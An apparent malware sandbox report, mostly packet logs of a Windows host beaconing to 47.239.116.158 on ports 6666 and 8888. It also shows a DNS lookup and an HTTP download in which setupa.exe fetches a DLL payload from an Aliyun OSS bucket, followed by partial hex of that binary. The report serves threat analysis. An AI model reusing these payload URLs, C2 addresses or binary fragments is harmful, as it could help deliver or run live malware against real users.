                                                                                                            Oct 7, 2024 06:39:19.295345068 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.295366049 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.295414925 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.295449972 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.295460939 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.295483112 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.295486927 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.295517921 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733386040 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733438969 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733472109 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733504057 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.733525038 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733556986 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733612061 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733618021 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.733663082 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733695984 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733711004 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.733743906 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.733766079 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733798981 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733831882 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733865976 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733874083 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.733899117 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733906984 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.733933926 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733967066 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.733978987 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.734004021 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734090090 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.734421968 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734474897 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734508991 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734541893 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734545946 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.734575987 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734610081 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734623909 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.734647036 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734680891 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.734692097 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.734744072 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948117018 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948184013 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948215008 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948254108 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948276043 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948333025 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948338985 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948386908 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948440075 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948489904 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948523045 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948523045 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948550940 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948575020 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948612928 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948646069 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948662996 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948715925 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948729038 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948751926 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948785067 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948805094 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948817015 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948862076 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.948870897 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948904991 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948956013 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948991060 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.948995113 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949024916 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949039936 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949090004 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949139118 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949141026 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949176073 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949208975 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949239969 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949244976 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949276924 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949311018 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949337006 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949362040 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949366093 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949420929 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949472904 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949481964 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949506998 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949539900 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949568987 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949573040 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949624062 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949656963 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949678898 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949692011 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949701071 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949731112 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949764967 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949796915 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949810982 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949831009 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949862957 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949876070 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949898958 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949930906 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949934959 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.949965954 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949996948 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.949997902 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.950028896 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.950059891 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.950062037 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.950094938 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.950128078 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.950143099 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.950162888 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.950172901 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:20.033807039 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:22.029534101 CEST497676666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:22.034552097 CEST66664976747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:22.034625053 CEST497676666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:22.036827087 CEST497676666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:22.041698933 CEST66664976747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:22.930978060 CEST66664976747.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:23.018440008 CEST497676666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:23.991892099 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:23.996829033 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:23.996916056 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:25.810719013 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:25.815798998 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:25.815835953 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:25.815864086 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:25.815933943 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:25.971716881 CEST497676666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:26.122354031 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:26.122785091 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:26.127804995 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:33.524801970 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:33.529740095 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:33.529762030 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:33.529831886 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:33.529839993 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:34.085776091 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:34.088735104 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:34.093734026 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:38.346658945 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:38.351790905 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:38.656737089 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:38.705842972 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:38.728533030 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:38.733592987 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:38.733629942 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:38.733658075 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:38.733736038 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:44.768604994 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:44.773614883 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:45.092762947 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:45.143449068 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:45.151835918 CEST497806666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:45.156829119 CEST66664978047.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:45.156842947 CEST66664978047.239.116.158192.168.2.5
Oct 7, 2024 06:39:45.156864882 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:39:45.156888962 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:39:56.299850941 CEST | 49728 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:39:56.304857969 CEST | 6666 | 49728 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:39:56.698935986 CEST | 6666 | 49728 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:39:56.752871990 CEST | 49728 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:39:56.768667936 CEST | 49728 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:39:56.773473978 CEST | 6666 | 49728 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:39:56.773540974 CEST | 6666 | 49728 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:39:56.773554087 CEST | 6666 | 49728 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:39:56.773664951 CEST | 6666 | 49728 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:01.737974882 CEST | 49780 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:01.743467093 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:02.062403917 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:02.112432957 CEST | 49780 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:02.526561975 CEST | 49780 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:02.532135963 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:02.532176018 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:02.532205105 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:02.532238007 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:14.725646973 CEST | 49728 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:14.731060028 CEST | 6666 | 49728 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:15.036048889 CEST | 6666 | 49728 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:15.081170082 CEST | 49728 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:15.114309072 CEST | 49728 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:15.119721889 CEST | 6666 | 49728 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:15.119766951 CEST | 6666 | 49728 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:15.119807959 CEST | 6666 | 49728 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:15.119842052 CEST | 6666 | 49728 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:21.331665039 CEST | 49780 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:21.337133884 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:21.656496048 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:21.706485987 CEST | 49780 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:22.104919910 CEST | 49780 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:22.110218048 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:22.110259056 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:22.110286951 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:22.110317945 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:34.518922091 CEST | 49728 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:34.519037962 CEST | 49728 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:34.524056911 CEST | 6666 | 49728 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:34.524111986 CEST | 49728 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:36.473982096 CEST | 49998 | 8888 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:36.479155064 CEST | 8888 | 49998 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:36.479356050 CEST | 49998 | 8888 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:38.509994984 CEST | 8888 | 49998 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:38.511511087 CEST | 49998 | 8888 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:38.514808893 CEST | 49998 | 8888 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:41.612870932 CEST | 49780 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:41.618215084 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:41.952647924 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:42.034607887 CEST | 49780 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:42.093835115 CEST | 49780 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:40:42.099287033 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:42.099325895 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:42.099353075 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:40:42.099407911 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:41:01.378767014 CEST | 49999 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:41:01.383821011 CEST | 6666 | 49999 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:41:01.383893013 CEST | 49999 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:41:02.159769058 CEST | 49780 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:41:02.164980888 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:41:02.484060049 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:41:02.560877085 CEST | 49780 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:41:02.565942049 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:41:02.565977097 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:41:02.566004038 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:41:02.566328049 CEST | 6666 | 49780 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:41:08.190325022 CEST | 49999 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:41:08.195765972 CEST | 6666 | 49999 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:41:08.195805073 CEST | 6666 | 49999 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:41:08.195837975 CEST | 6666 | 49999 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:41:08.195864916 CEST | 6666 | 49999 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:41:08.936085939 CEST | 6666 | 49999 | 47.239.116.158 | 192.168.2.5
Oct 7, 2024 06:41:08.936307907 CEST | 49999 | 6666 | 192.168.2.5 | 47.239.116.158
Oct 7, 2024 06:41:08.941257954 CEST | 6666 | 49999 | 47.239.116.158 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 7, 2024 06:39:01.617942095 CEST | 55591 | 53 | 192.168.2.5 | 1.1.1.1
Oct 7, 2024 06:39:01.813401937 CEST | 53 | 55591 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 7, 2024 06:39:01.617942095 CEST | 192.168.2.5 | 1.1.1.1 | 0x877a | Standard query (0) | kehu8.oss-cn-hongkong.aliyuncs.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 7, 2024 06:39:01.813401937 CEST | 1.1.1.1 | 192.168.2.5 | 0x877a | No error (0) | kehu8.oss-cn-hongkong.aliyuncs.com | | 47.79.64.157 | A (IP address) | IN (0x0001) | false
Oct 7, 2024 06:39:14.336462021 CEST | 1.1.1.1 | 192.168.2.5 | 0x20c9 | No error (0) | fp2e7a.wpc.2be4.phicdn.net | fp2e7a.wpc.phicdn.net | | CNAME (Canonical name) | IN (0x0001) | false
Oct 7, 2024 06:39:14.336462021 CEST | 1.1.1.1 | 192.168.2.5 | 0x20c9 | No error (0) | fp2e7a.wpc.phicdn.net | | 192.229.221.95 | A (IP address) | IN (0x0001) | false
• kehu8.oss-cn-hongkong.aliyuncs.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 47.79.64.157 | 443 | 4768 | C:\Users\user\Desktop\setupa.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 04:39:03 UTC | 138 | OUT | GET /ClassicStartMenuDLL.dll HTTP/1.1
Connection: Keep-Alive
User-Agent: SecureWinHTTP/1.0
Host: kehu8.oss-cn-hongkong.aliyuncs.com
2024-10-07 04:39:03 UTC | 562 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Mon, 07 Oct 2024 04:39:03 GMT
Content-Type: application/octet-stream
Content-Length: 243712
Connection: close
x-oss-request-id: 670365E7D7863C3331B7D28D
Accept-Ranges: bytes
ETag: "D48560E3661D0EAE2E67CB13044710C3"
Last-Modified: Mon, 23 Sep 2024 14:23:44 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 12115741117753056869
x-oss-storage-class: Standard
x-oss-ec: 0048-00000113
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: 1IVg42YdDq4uZ8sTBEcQww==
x-oss-server-time: 44
2024-10-07 04:39:03 UTC | 15822 | IN | Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 82 3e 0c 67 c6 5f 62 34 c6 5f 62 34 c6 5f 62 34 72 c3 93 34 c8 5f 62 34 72 c3 91 34 bb 5f 62 34 72 c3 90 34 df 5f 62 34 1b a0 a9 34 c1 5f 62 34 c6 5f 63 34 47 5f 62 34 58 ff a5 34 c7 5f 62 34 23 06 61 35 d1 5f 62 34 23 06 67 35 a7 5f 62 34 23 06 66 35 d1 5f 62 34 c6 5f 62 34 c2 5f 62 34 34 06 61 35 c7 5f 62 34 34 06 66 35 c7 5f 62 34 34 06 67 35 c4 5f 62 34 34 06 62 35 c7 5f 62
Data Ascii: MZ@(!L!This program cannot be run in DOS mode.$>g_b4_b4_b4r4_b4r4_b4r4_b44_b4_c4G_b4X4_b4#a5_b4#g5_b4#f5_b4_b4_b44a5_b44f5_b44g5_b44b5_b
2024-10-07 04:39:03 UTC | 16384 | IN | Data Raw: 24 89 44 24 04 56 57 e8 16 73 00 00 8b 0c 24 b8 32 fa 9d 13 01 c1 b0 01 89 44 24 0c e9 81 fe ff ff 90 31 d2 81 f9 2d 49 9b a8 0f 9f c2 c1 e2 04 8b 94 02 cc 00 00 00 01 da ff e2 31 d2 81 f9 f1 c5 8a a6 0f 9c c2 c1 e2 06 8b 54 02 0c 01 da ff e2 81 f9 2c 8b ac 93 ba 54 00 00 00 be 98 00 00 00 0f 44 d6 8b 04 10 01 d8 ff e0 8b 0c 24 b8 32 fa 9d 13 c7 44 24 0c 00 00 00 00 01 c1 e9 20 fe ff ff 81 f9 90 f0 2e 6d ba c4 00 00 00 be 00 00 00 00 0f 4c d6 8b 14 10 01 da ff e2 81 f9 a1 23 7c 5f ba 58 00 00 00 be 6c 00 00 00 0f 4c d6 8b 14 10 01 da ff e2 81 f9 4d 21 f4 5a ba 04 00 00 00 be e4 00 00 00 0f 44 d6 8b 04 10 01 d8 ff e0 8b 44 24 1c 89 44 24 18 8b 44 24 18 8b 00 89 44 24 14 e9 69 02 00 00 81 f9 63 a5 e7 92 ba 64 00 00 00 be a8 00 00 00 0f 4c d6 8b 14 10 01 da
Data Ascii: $D$VWs$2D$1-I1T,TD$2D$ .mL#|_XlLM!ZDD$D$D$D$icdL
